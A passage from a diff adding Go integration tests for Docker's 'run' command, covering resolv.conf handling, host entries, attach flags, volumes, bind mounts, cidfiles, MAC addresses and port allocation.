+ c.Fatal(err) + } + + fmode := (os.FileMode)(0644) + finfo, err := os.Stat(containerStorageFile(cID, "resolv.conf")) + if err != nil { + c.Fatal(err) + } + + if (finfo.Mode() & fmode) != fmode { + c.Fatalf("Expected container resolv.conf mode to be at least %s, instead got %s", fmode.String(), finfo.Mode().String()) + } +} + +// Test if container resolv.conf gets updated the next time it restarts +// if host /etc/resolv.conf has changed. This only applies if the container +// uses the host's /etc/resolv.conf and does not have any dns options provided. 
+func (s *DockerSuite) TestRunResolvconfUpdate(c *check.C) { + // Not applicable on Windows as testing unix specific functionality + testRequires(c, SameHostDaemon, DaemonIsLinux) + c.Skip("Unstable test, to be re-activated once #19937 is resolved") + + tmpResolvConf := []byte("search pommesfrites.fr\nnameserver 12.34.56.78\n") + tmpLocalhostResolvConf := []byte("nameserver 127.0.0.1") + + //take a copy of resolv.conf for restoring after test completes + resolvConfSystem, err := ioutil.ReadFile("/etc/resolv.conf") + if err != nil { + c.Fatal(err) + } + + // This test case is meant to test monitoring resolv.conf when it is + // a regular file not a bind mount. So we unmount resolv.conf and replace + // it with a file containing the original settings. + mounted, err := mount.Mounted("/etc/resolv.conf") + if err != nil { + c.Fatal(err) + } + if mounted { + cmd := exec.Command("umount", "/etc/resolv.conf") + if _, err = runCommand(cmd); err != nil { + c.Fatal(err) + } + } + + //cleanup + defer func() { + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } + }() + + //1. 
test that a restarting container gets an updated resolv.conf + dockerCmd(c, "run", "--name=first", "busybox", "true") + containerID1, err := getIDByName("first") + if err != nil { + c.Fatal(err) + } + + // replace resolv.conf with our temporary copy + bytesResolvConf := []byte(tmpResolvConf) + if err := ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + // start the container again to pickup changes + dockerCmd(c, "start", "first") + + // check for update in container + containerResolv, err := readContainerFile(containerID1, "resolv.conf") + if err != nil { + c.Fatal(err) + } + if !bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Restarted container does not have updated resolv.conf; expected %q, got %q", tmpResolvConf, string(containerResolv)) + } + + /* //make a change to resolv.conf (in this case replacing our tmp copy with orig copy) + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } */ + //2. test that a restarting container does not receive resolv.conf updates + // if it modified the container copy of the starting point resolv.conf + dockerCmd(c, "run", "--name=second", "busybox", "sh", "-c", "echo 'search mylittlepony.com' >>/etc/resolv.conf") + containerID2, err := getIDByName("second") + if err != nil { + c.Fatal(err) + } + + //make a change to resolv.conf (in this case replacing our tmp copy with orig copy) + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } + + // start the container again + dockerCmd(c, "start", "second") + + // check for update in container + containerResolv, err = readContainerFile(containerID2, "resolv.conf") + if err != nil { + c.Fatal(err) + } + + if bytes.Equal(containerResolv, resolvConfSystem) { + c.Fatalf("Container's resolv.conf should not have been updated with host resolv.conf: %q", string(containerResolv)) + } + + //3. 
test that a running container's resolv.conf is not modified while running + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + runningContainerID := strings.TrimSpace(out) + + // replace resolv.conf + if err := ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + // check for update in container + containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") + if err != nil { + c.Fatal(err) + } + + if bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Running container should not have updated resolv.conf; expected %q, got %q", string(resolvConfSystem), string(containerResolv)) + } + + //4. test that a running container's resolv.conf is updated upon restart + // (the above container is still running..) + dockerCmd(c, "restart", runningContainerID) + + // check for update in container + containerResolv, err = readContainerFile(runningContainerID, "resolv.conf") + if err != nil { + c.Fatal(err) + } + if !bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Restarted container should have updated resolv.conf; expected %q, got %q", string(bytesResolvConf), string(containerResolv)) + } + + //5. 
test that additions of a localhost resolver are cleaned from + // host resolv.conf before updating container's resolv.conf copies + + // replace resolv.conf with a localhost-only nameserver copy + bytesResolvConf = []byte(tmpLocalhostResolvConf) + if err = ioutil.WriteFile("/etc/resolv.conf", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + // start the container again to pickup changes + dockerCmd(c, "start", "first") + + // our first exited container ID should have been updated, but with default DNS + // after the cleanup of resolv.conf found only a localhost nameserver: + containerResolv, err = readContainerFile(containerID1, "resolv.conf") + if err != nil { + c.Fatal(err) + } + + expected := "\nnameserver 8.8.8.8\nnameserver 8.8.4.4\n" + if !bytes.Equal(containerResolv, []byte(expected)) { + c.Fatalf("Container does not have cleaned/replaced DNS in resolv.conf; expected %q, got %q", expected, string(containerResolv)) + } + + //6. Test that replacing (as opposed to modifying) resolv.conf triggers an update + // of containers' resolv.conf. 
+ + // Restore the original resolv.conf + if err := ioutil.WriteFile("/etc/resolv.conf", resolvConfSystem, 0644); err != nil { + c.Fatal(err) + } + + // Run the container so it picks up the old settings + dockerCmd(c, "run", "--name=third", "busybox", "true") + containerID3, err := getIDByName("third") + if err != nil { + c.Fatal(err) + } + + // Create a modified resolv.conf.aside and override resolv.conf with it + bytesResolvConf = []byte(tmpResolvConf) + if err := ioutil.WriteFile("/etc/resolv.conf.aside", bytesResolvConf, 0644); err != nil { + c.Fatal(err) + } + + err = os.Rename("/etc/resolv.conf.aside", "/etc/resolv.conf") + if err != nil { + c.Fatal(err) + } + + // start the container again to pickup changes + dockerCmd(c, "start", "third") + + // check for update in container + containerResolv, err = readContainerFile(containerID3, "resolv.conf") + if err != nil { + c.Fatal(err) + } + if !bytes.Equal(containerResolv, bytesResolvConf) { + c.Fatalf("Stopped container does not have updated resolv.conf; expected\n%q\n got\n%q", tmpResolvConf, string(containerResolv)) + } + + //cleanup, restore original resolv.conf happens in defer func() +} + +func (s *DockerSuite) TestRunAddHost(c *check.C) { + // Not applicable on Windows as it does not support --add-host + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--add-host=extra:86.75.30.9", "busybox", "grep", "extra", "/etc/hosts") + + actual := strings.Trim(out, "\r\n") + if actual != "86.75.30.9\textra" { + c.Fatalf("expected '86.75.30.9\textra', but says: %q", actual) + } +} + +// Regression test for #6983 +func (s *DockerSuite) TestRunAttachStdErrOnlyTTYMode(c *check.C) { + _, exitCode := dockerCmd(c, "run", "-t", "-a", "stderr", "busybox", "true") + if exitCode != 0 { + c.Fatalf("Container should have exited with error code 0") + } +} + +// Regression test for #6983 +func (s *DockerSuite) TestRunAttachStdOutOnlyTTYMode(c *check.C) { + _, exitCode := dockerCmd(c, "run", "-t", "-a", "stdout", 
"busybox", "true") + if exitCode != 0 { + c.Fatalf("Container should have exited with error code 0") + } +} + +// Regression test for #6983 +func (s *DockerSuite) TestRunAttachStdOutAndErrTTYMode(c *check.C) { + _, exitCode := dockerCmd(c, "run", "-t", "-a", "stdout", "-a", "stderr", "busybox", "true") + if exitCode != 0 { + c.Fatalf("Container should have exited with error code 0") + } +} + +// Test for #10388 - this will run the same test as TestRunAttachStdOutAndErrTTYMode +// but using --attach instead of -a to make sure we read the flag correctly +func (s *DockerSuite) TestRunAttachWithDetach(c *check.C) { + cmd := exec.Command(dockerBinary, "run", "-d", "--attach", "stdout", "busybox", "true") + _, stderr, _, err := runCommandWithStdoutStderr(cmd) + if err == nil { + c.Fatal("Container should have exited with error code different than 0") + } else if !strings.Contains(stderr, "Conflicting options: -a and -d") { + c.Fatal("Should have been returned an error with conflicting options -a and -d") + } +} + +func (s *DockerSuite) TestRunState(c *check.C) { + // TODO Windows: This needs some rework as Windows busybox does not support top + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "-d", "busybox", "top") + + id := strings.TrimSpace(out) + state := inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid1 := inspectField(c, id, "State.Pid") + if pid1 == "0" { + c.Fatal("Container state Pid 0") + } + + dockerCmd(c, "stop", id) + state = inspectField(c, id, "State.Running") + if state != "false" { + c.Fatal("Container state is 'running'") + } + pid2 := inspectField(c, id, "State.Pid") + if pid2 == pid1 { + c.Fatalf("Container state Pid %s, but expected %s", pid2, pid1) + } + + dockerCmd(c, "start", id) + state = inspectField(c, id, "State.Running") + if state != "true" { + c.Fatal("Container state is 'not running'") + } + pid3 := inspectField(c, id, "State.Pid") + if pid3 == pid1 { + 
c.Fatalf("Container state Pid %s, but expected %s", pid3, pid1) + } +} + +// Test for #1737 +func (s *DockerSuite) TestRunCopyVolumeUIDGID(c *check.C) { + // Not applicable on Windows as it does not support uid or gid in this way + testRequires(c, DaemonIsLinux) + name := "testrunvolumesuidgid" + _, err := buildImage(name, + `FROM busybox + RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd + RUN echo 'dockerio:x:1001:' >> /etc/group + RUN mkdir -p /hello && touch /hello/test && chown dockerio.dockerio /hello`, + true) + if err != nil { + c.Fatal(err) + } + + // Test that the uid and gid is copied from the image to the volume + out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "sh", "-c", "ls -l / | grep hello | awk '{print $3\":\"$4}'") + out = strings.TrimSpace(out) + if out != "dockerio:dockerio" { + c.Fatalf("Wrong /hello ownership: %s, expected dockerio:dockerio", out) + } +} + +// Test for #1582 +func (s *DockerSuite) TestRunCopyVolumeContent(c *check.C) { + // TODO Windows, post TP5. Windows does not yet support volume functionality + // that copies from the image to the volume. 
+ testRequires(c, DaemonIsLinux) + name := "testruncopyvolumecontent" + _, err := buildImage(name, + `FROM busybox + RUN mkdir -p /hello/local && echo hello > /hello/local/world`, + true) + if err != nil { + c.Fatal(err) + } + + // Test that the content is copied from the image to the volume + out, _ := dockerCmd(c, "run", "--rm", "-v", "/hello", name, "find", "/hello") + if !(strings.Contains(out, "/hello/local/world") && strings.Contains(out, "/hello/local")) { + c.Fatal("Container failed to transfer content to volume") + } +} + +func (s *DockerSuite) TestRunCleanupCmdOnEntrypoint(c *check.C) { + name := "testrunmdcleanuponentrypoint" + if _, err := buildImage(name, + `FROM busybox + ENTRYPOINT ["echo"] + CMD ["testingpoint"]`, + true); err != nil { + c.Fatal(err) + } + + out, exit := dockerCmd(c, "run", "--entrypoint", "whoami", name) + if exit != 0 { + c.Fatalf("expected exit code 0 received %d, out: %q", exit, out) + } + out = strings.TrimSpace(out) + expected := "root" + if daemonPlatform == "windows" { + if strings.Contains(WindowsBaseImage, "windowsservercore") { + expected = `user manager\containeradministrator` + } else { + expected = `ContainerAdministrator` // nanoserver + } + } + if out != expected { + c.Fatalf("Expected output %s, got %q. 
%s", expected, out, WindowsBaseImage) + } +} + +// TestRunWorkdirExistsAndIsFile checks that if 'docker run -w' with existing file can be detected +func (s *DockerSuite) TestRunWorkdirExistsAndIsFile(c *check.C) { + existingFile := "/bin/cat" + expected := "not a directory" + if daemonPlatform == "windows" { + existingFile = `\windows\system32\ntdll.dll` + expected = `The directory name is invalid.` + } + + out, exitCode, err := dockerCmdWithError("run", "-w", existingFile, "busybox") + if !(err != nil && exitCode == 125 && strings.Contains(out, expected)) { + c.Fatalf("Existing binary as a directory should error out with exitCode 125; we got: %s, exitCode: %d", out, exitCode) + } +} + +func (s *DockerSuite) TestRunExitOnStdinClose(c *check.C) { + name := "testrunexitonstdinclose" + + meow := "/bin/cat" + delay := 60 + if daemonPlatform == "windows" { + meow = "cat" + } + runCmd := exec.Command(dockerBinary, "run", "--name", name, "-i", "busybox", meow) + + stdin, err := runCmd.StdinPipe() + if err != nil { + c.Fatal(err) + } + stdout, err := runCmd.StdoutPipe() + if err != nil { + c.Fatal(err) + } + + if err := runCmd.Start(); err != nil { + c.Fatal(err) + } + if _, err := stdin.Write([]byte("hello\n")); err != nil { + c.Fatal(err) + } + + r := bufio.NewReader(stdout) + line, err := r.ReadString('\n') + if err != nil { + c.Fatal(err) + } + line = strings.TrimSpace(line) + if line != "hello" { + c.Fatalf("Output should be 'hello', got '%q'", line) + } + if err := stdin.Close(); err != nil { + c.Fatal(err) + } + finish := make(chan error) + go func() { + finish <- runCmd.Wait() + close(finish) + }() + select { + case err := <-finish: + c.Assert(err, check.IsNil) + case <-time.After(time.Duration(delay) * time.Second): + c.Fatal("docker run failed to exit on stdin close") + } + state := inspectField(c, name, "State.Running") + + if state != "false" { + c.Fatal("Container must be stopped after stdin closing") + } +} + +// Test run -i --restart xxx doesn't hang +func 
(s *DockerSuite) TestRunInteractiveWithRestartPolicy(c *check.C) { + name := "test-inter-restart" + + result := icmd.StartCmd(icmd.Cmd{ + Command: []string{dockerBinary, "run", "-i", "--name", name, "--restart=always", "busybox", "sh"}, + Stdin: bytes.NewBufferString("exit 11"), + }) + c.Assert(result.Error, checker.IsNil) + defer func() { + dockerCmdWithResult("stop", name).Assert(c, icmd.Success) + }() + + result = icmd.WaitOnCmd(60*time.Second, result) + c.Assert(result, icmd.Matches, icmd.Expected{ExitCode: 11}) +} + +// Test for #2267 +func (s *DockerSuite) TestRunWriteHostsFileAndNotCommit(c *check.C) { + // Cannot run on Windows as Windows does not support diff. + testRequires(c, DaemonIsLinux) + name := "writehosts" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hosts && cat /etc/hosts") + if !strings.Contains(out, "test2267") { + c.Fatal("/etc/hosts should contain 'test2267'") + } + + out, _ = dockerCmd(c, "diff", name) + if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { + c.Fatal("diff should be empty") + } +} + +func eqToBaseDiff(out string, c *check.C) bool { + name := "eqToBaseDiff" + stringutils.GenerateRandomAlphaOnlyString(32) + dockerCmd(c, "run", "--name", name, "busybox", "echo", "hello") + cID, err := getIDByName(name) + c.Assert(err, check.IsNil) + + baseDiff, _ := dockerCmd(c, "diff", cID) + baseArr := strings.Split(baseDiff, "\n") + sort.Strings(baseArr) + outArr := strings.Split(out, "\n") + sort.Strings(outArr) + return sliceEq(baseArr, outArr) +} + +func sliceEq(a, b []string) bool { + if len(a) != len(b) { + return false + } + + for i := range a { + if a[i] != b[i] { + return false + } + } + + return true +} + +// Test for #2267 +func (s *DockerSuite) TestRunWriteHostnameFileAndNotCommit(c *check.C) { + // Cannot run on Windows as Windows does not support diff. 
+ testRequires(c, DaemonIsLinux) + name := "writehostname" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/hostname && cat /etc/hostname") + if !strings.Contains(out, "test2267") { + c.Fatal("/etc/hostname should contain 'test2267'") + } + + out, _ = dockerCmd(c, "diff", name) + if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { + c.Fatal("diff should be empty") + } +} + +// Test for #2267 +func (s *DockerSuite) TestRunWriteResolvFileAndNotCommit(c *check.C) { + // Cannot run on Windows as Windows does not support diff. + testRequires(c, DaemonIsLinux) + name := "writeresolv" + out, _ := dockerCmd(c, "run", "--name", name, "busybox", "sh", "-c", "echo test2267 >> /etc/resolv.conf && cat /etc/resolv.conf") + if !strings.Contains(out, "test2267") { + c.Fatal("/etc/resolv.conf should contain 'test2267'") + } + + out, _ = dockerCmd(c, "diff", name) + if len(strings.Trim(out, "\r\n")) != 0 && !eqToBaseDiff(out, c) { + c.Fatal("diff should be empty") + } +} + +func (s *DockerSuite) TestRunWithBadDevice(c *check.C) { + // Cannot run on Windows as Windows does not support --device + testRequires(c, DaemonIsLinux) + name := "baddevice" + out, _, err := dockerCmdWithError("run", "--name", name, "--device", "/etc", "busybox", "true") + + if err == nil { + c.Fatal("Run should fail with bad device") + } + expected := `"/etc": not a device node` + if !strings.Contains(out, expected) { + c.Fatalf("Output should contain %q, actual out: %q", expected, out) + } +} + +func (s *DockerSuite) TestRunEntrypoint(c *check.C) { + name := "entrypoint" + + out, _ := dockerCmd(c, "run", "--name", name, "--entrypoint", "echo", "busybox", "-n", "foobar") + expected := "foobar" + + if out != expected { + c.Fatalf("Output should be %q, actual out: %q", expected, out) + } +} + +func (s *DockerSuite) TestRunBindMounts(c *check.C) { + testRequires(c, SameHostDaemon) + if daemonPlatform == "linux" { + testRequires(c, DaemonIsLinux, 
NotUserNamespace) + } + + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + tmpDir, err := ioutil.TempDir("", "docker-test-container") + if err != nil { + c.Fatal(err) + } + + defer os.RemoveAll(tmpDir) + writeFile(path.Join(tmpDir, "touch-me"), "", c) + + // TODO Windows: Temporary check - remove once TP5 support is dropped + if daemonPlatform != "windows" || windowsDaemonKV >= 14350 { + // Test reading from a read-only bind mount + out, _ := dockerCmd(c, "run", "-v", fmt.Sprintf("%s:%s/tmp:ro", tmpDir, prefix), "busybox", "ls", prefix+"/tmp") + if !strings.Contains(out, "touch-me") { + c.Fatal("Container failed to read from bind mount") + } + } + + // test writing to bind mount + if daemonPlatform == "windows" { + dockerCmd(c, "run", "-v", fmt.Sprintf(`%s:c:\tmp:rw`, tmpDir), "busybox", "touch", "c:/tmp/holla") + } else { + dockerCmd(c, "run", "-v", fmt.Sprintf("%s:/tmp:rw", tmpDir), "busybox", "touch", "/tmp/holla") + } + + readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist + + // test mounting to an illegal destination directory + _, _, err = dockerCmdWithError("run", "-v", fmt.Sprintf("%s:.", tmpDir), "busybox", "ls", ".") + if err == nil { + c.Fatal("Container bind mounted illegal directory") + } + + // Windows does not (and likely never will) support mounting a single file + if daemonPlatform != "windows" { + // test mount a file + dockerCmd(c, "run", "-v", fmt.Sprintf("%s/holla:/tmp/holla:rw", tmpDir), "busybox", "sh", "-c", "echo -n 'yotta' > /tmp/holla") + content := readFile(path.Join(tmpDir, "holla"), c) // Will fail if the file doesn't exist + expected := "yotta" + if content != expected { + c.Fatalf("Output should be %q, actual out: %q", expected, content) + } + } +} + +// Ensure that CIDFile gets deleted if it's empty +// Perform this test by making `docker run` fail +func (s *DockerSuite) TestRunCidFileCleanupIfEmpty(c *check.C) { + // Skip on Windows. Base image on Windows has a CMD set in the image. 
+ testRequires(c, DaemonIsLinux) + + tmpDir, err := ioutil.TempDir("", "TestRunCidFile") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + tmpCidFile := path.Join(tmpDir, "cid") + + image := "emptyfs" + if daemonPlatform == "windows" { + // Windows can't support an emptyfs image. Just use the regular Windows image + image = WindowsBaseImage + } + out, _, err := dockerCmdWithError("run", "--cidfile", tmpCidFile, image) + if err == nil { + c.Fatalf("Run without command must fail. out=%s", out) + } else if !strings.Contains(out, "No command specified") { + c.Fatalf("Run without command failed with wrong output. out=%s\nerr=%v", out, err) + } + + if _, err := os.Stat(tmpCidFile); err == nil { + c.Fatalf("empty CIDFile %q should've been deleted", tmpCidFile) + } +} + +// #2098 - Docker cidFiles only contain short version of the containerId +//sudo docker run --cidfile /tmp/docker_tesc.cid ubuntu echo "test" +// TestRunCidFile tests that run --cidfile returns the longid +func (s *DockerSuite) TestRunCidFileCheckIDLength(c *check.C) { + tmpDir, err := ioutil.TempDir("", "TestRunCidFile") + if err != nil { + c.Fatal(err) + } + tmpCidFile := path.Join(tmpDir, "cid") + defer os.RemoveAll(tmpDir) + + out, _ := dockerCmd(c, "run", "-d", "--cidfile", tmpCidFile, "busybox", "true") + + id := strings.TrimSpace(out) + buffer, err := ioutil.ReadFile(tmpCidFile) + if err != nil { + c.Fatal(err) + } + cid := string(buffer) + if len(cid) != 64 { + c.Fatalf("--cidfile should be a long id, not %q", id) + } + if cid != id { + c.Fatalf("cid must be equal to %s, got %s", id, cid) + } +} + +func (s *DockerSuite) TestRunSetMacAddress(c *check.C) { + mac := "12:34:56:78:9a:bc" + var out string + if daemonPlatform == "windows" { + out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "sh", "-c", "ipconfig /all | grep 'Physical Address' | awk '{print $12}'") + mac = strings.Replace(strings.ToUpper(mac), ":", "-", -1) // To Windows-style 
MACs + } else { + out, _ = dockerCmd(c, "run", "-i", "--rm", fmt.Sprintf("--mac-address=%s", mac), "busybox", "/bin/sh", "-c", "ip link show eth0 | tail -1 | awk '{print $2}'") + } + + actualMac := strings.TrimSpace(out) + if actualMac != mac { + c.Fatalf("Set MAC address with --mac-address failed. The container has an incorrect MAC address: %q, expected: %q", actualMac, mac) + } +} + +func (s *DockerSuite) TestRunInspectMacAddress(c *check.C) { + // TODO Windows. Network settings are not propagated back to inspect. + testRequires(c, DaemonIsLinux) + mac := "12:34:56:78:9a:bc" + out, _ := dockerCmd(c, "run", "-d", "--mac-address="+mac, "busybox", "top") + + id := strings.TrimSpace(out) + inspectedMac := inspectField(c, id, "NetworkSettings.Networks.bridge.MacAddress") + if inspectedMac != mac { + c.Fatalf("docker inspect outputs wrong MAC address: %q, should be: %q", inspectedMac, mac) + } +} + +// test docker run use an invalid mac address +func (s *DockerSuite) TestRunWithInvalidMacAddress(c *check.C) { + out, _, err := dockerCmdWithError("run", "--mac-address", "92:d0:c6:0a:29", "busybox") + //use an invalid mac address should with an error out + if err == nil || !strings.Contains(out, "is not a valid mac address") { + c.Fatalf("run with an invalid --mac-address should with error out") + } +} + +func (s *DockerSuite) TestRunDeallocatePortOnMissingIptablesRule(c *check.C) { + // TODO Windows. Network settings are not propagated back to inspect. 
+ testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") + + id := strings.TrimSpace(out) + ip := inspectField(c, id, "NetworkSettings.Networks.bridge.IPAddress") + iptCmd := exec.Command("iptables", "-D", "DOCKER", "-d", fmt.Sprintf("%s/32", ip), + "!", "-i", "docker0", "-o", "docker0", "-p", "tcp", "-m", "tcp", "--dport", "23", "-j", "ACCEPT") + out, _, err := runCommandWithOutput(iptCmd) + if err != nil { + c.Fatal(err, out) + } + if err := deleteContainer(id); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-d", "-p", "23:23", "busybox", "top") +} + +func (s *DockerSuite) TestRunPortInUse(c *check.C) { + // TODO Windows. The duplicate NAT message returned by Windows will be + // changing as is currently completely undecipherable. Does need modifying + // to run sh rather than top though as top isn't in Windows busybox. + testRequires(c, SameHostDaemon, DaemonIsLinux) + + port := "1234" + dockerCmd(c, "run", "-d", "-p", port+":80", "busybox", "top") + + out, _, err := dockerCmdWithError("run", "-d", "-p", port+":80", "busybox", "top") + if err == nil { + c.Fatalf("Binding on used port must fail") + } + if !strings.Contains(out, "port is already allocated") { + c.Fatalf("Out must be about \"port is already allocated\", got %s", out) + } +} + +// https://github.com/docker/docker/issues/12148 +func (s *DockerSuite) TestRunAllocatePortInReservedRange(c *check.C) { + // TODO Windows. 
-P is not yet supported + testRequires(c, DaemonIsLinux) + // allocate a dynamic port to get the most recent + out, _ := dockerCmd(c, "run", "-d", "-P", "-p", "80", "busybox", "top") + + id := strings.TrimSpace(out) + out, _ = dockerCmd(c, "port", id, "80") + + strPort := strings.Split(strings.TrimSpace(out), ":")[1] + port, err := strconv.ParseInt(strPort, 10, 64) + if err != nil { + c.Fatalf("invalid port, got: %s, error: %s", strPort, err) + } + + // allocate a static port and a dynamic port together, with static port + // takes the next recent port in dynamic port range. + dockerCmd(c, "run", "-d", "-P", "-p", "80", "-p", fmt.Sprintf("%d:8080", port+1), "busybox", "top") +} + +// Regression test for #7792 +func (s *DockerSuite) TestRunMountOrdering(c *check.C) { + // TODO Windows: Post TP5. Updated, but Windows does not support nested mounts currently. + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + tmpDir, err := ioutil.TempDir("", "docker_nested_mount_test") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + tmpDir2, err := ioutil.TempDir("", "docker_nested_mount_test2") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir2) + + // Create a temporary tmpfs mount. 
+ fooDir := filepath.Join(tmpDir, "foo") + if err := os.MkdirAll(filepath.Join(tmpDir, "foo"), 0755); err != nil { + c.Fatalf("failed to mkdir at %s - %s", fooDir, err) + } + + if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", fooDir), []byte{}, 0644); err != nil { + c.Fatal(err) + } + + if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", tmpDir), []byte{}, 0644); err != nil { + c.Fatal(err) + } + + if err := ioutil.WriteFile(fmt.Sprintf("%s/touch-me", tmpDir2), []byte{}, 0644); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", + "-v", fmt.Sprintf("%s:"+prefix+"/tmp", tmpDir), + "-v", fmt.Sprintf("%s:"+prefix+"/tmp/foo", fooDir), + "-v", fmt.Sprintf("%s:"+prefix+"/tmp/tmp2", tmpDir2), + "-v", fmt.Sprintf("%s:"+prefix+"/tmp/tmp2/foo", fooDir), + "busybox:latest", "sh", "-c", + "ls "+prefix+"/tmp/touch-me && ls "+prefix+"/tmp/foo/touch-me && ls "+prefix+"/tmp/tmp2/touch-me && ls "+prefix+"/tmp/tmp2/foo/touch-me") +} + +// Regression test for https://github.com/docker/docker/issues/8259 +func (s *DockerSuite) TestRunReuseBindVolumeThatIsSymlink(c *check.C) { + // Not applicable on Windows as Windows does not support volumes + testRequires(c, SameHostDaemon, DaemonIsLinux, NotUserNamespace) + prefix, _ := getPrefixAndSlashFromDaemonPlatform() + + tmpDir, err := ioutil.TempDir(os.TempDir(), "testlink") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + + linkPath := os.TempDir() + "/testlink2" + if err := os.Symlink(tmpDir, linkPath); err != nil { + c.Fatal(err) + } + defer os.RemoveAll(linkPath) + + // Create first container + dockerCmd(c, "run", "-v", fmt.Sprintf("%s:"+prefix+"/tmp/test", linkPath), "busybox", "ls", prefix+"/tmp/test") + + // Create second container with same symlinked path + // This will fail if the referenced issue is hit with a "Volume exists" error + dockerCmd(c, "run", "-v", fmt.Sprintf("%s:"+prefix+"/tmp/test", linkPath), "busybox", "ls", prefix+"/tmp/test") +} + +//GH#10604: Test an "/etc" volume doesn't overlay 
special bind mounts in container +func (s *DockerSuite) TestRunCreateVolumeEtc(c *check.C) { + // While Windows supports volumes, it does not support --add-host hence + // this test is not applicable on Windows. + testRequires(c, DaemonIsLinux) + out, _ := dockerCmd(c, "run", "--dns=127.0.0.1", "-v", "/etc", "busybox", "cat", "/etc/resolv.conf") + if !strings.Contains(out, "nameserver 127.0.0.1") { + c.Fatal("/etc volume mount hides /etc/resolv.conf") + } + + out, _ = dockerCmd(c, "run", "-h=test123", "-v", "/etc", "busybox", "cat", "/etc/hostname") + if !strings.Contains(out, "test123") { + c.Fatal("/etc volume mount hides /etc/hostname") + } + + out, _ = dockerCmd(c, "run", "--add-host=test:192.168.0.1", "-v", "/etc", "busybox", "cat", "/etc/hosts") + out = strings.Replace(out, "\n", " ", -1) + if !strings.Contains(out, "192.168.0.1\ttest") || !strings.Contains(out, "127.0.0.1\tlocalhost") { + c.Fatal("/etc volume mount hides /etc/hosts") + } +} + +func (s *DockerSuite) TestVolumesNoCopyData(c *check.C) { + // TODO Windows (Post RS1). Windows does not support volumes which + // are pre-populated such as is built in the dockerfile used in this test. 
+ testRequires(c, DaemonIsLinux) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + if _, err := buildImage("dataimage", + `FROM busybox + RUN ["mkdir", "-p", "/foo"] + RUN ["touch", "/foo/bar"]`, + true); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "--name", "test", "-v", prefix+slash+"foo", "busybox") + + if out, _, err := dockerCmdWithError("run", "--volumes-from", "test", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("Data was copied on volumes-from but shouldn't be:\n%q", out) + } + + tmpDir := randomTmpDirPath("docker_test_bind_mount_copy_data", daemonPlatform) + if out, _, err := dockerCmdWithError("run", "-v", tmpDir+":/foo", "dataimage", "ls", "-lh", "/foo/bar"); err == nil || !strings.Contains(out, "No such file or directory") { + c.Fatalf("Data was copied on bind-mount but shouldn't be:\n%q", out) + } +} + +func (s *DockerSuite) TestRunNoOutputFromPullInStdout(c *check.C) { + // just run with unknown image + cmd := exec.Command(dockerBinary, "run", "asdfsg") + stdout := bytes.NewBuffer(nil) + cmd.Stdout = stdout + if err := cmd.Run(); err == nil { + c.Fatal("Run with unknown image should fail") + } + if stdout.Len() != 0 { + c.Fatalf("Stdout contains output from pull: %s", stdout) + } +} + +func (s *DockerSuite) TestRunVolumesCleanPaths(c *check.C) { + testRequires(c, SameHostDaemon) + prefix, slash := getPrefixAndSlashFromDaemonPlatform() + if _, err := buildImage("run_volumes_clean_paths", + `FROM busybox + VOLUME `+prefix+`/foo/`, + true); err != nil { + c.Fatal(err) + } + + dockerCmd(c, "run", "-v", prefix+"/foo", "-v", prefix+"/bar/", "--name", "dark_helmet", "run_volumes_clean_paths") + + out, err := inspectMountSourceField("dark_helmet", prefix+slash+"foo"+slash) + if err != errMountNotFound { + c.Fatalf("Found unexpected volume entry for '%s/foo/' in volumes\n%q", prefix, out) + } + + out, err = inspectMountSourceField("dark_helmet", prefix+slash+`foo`) + 
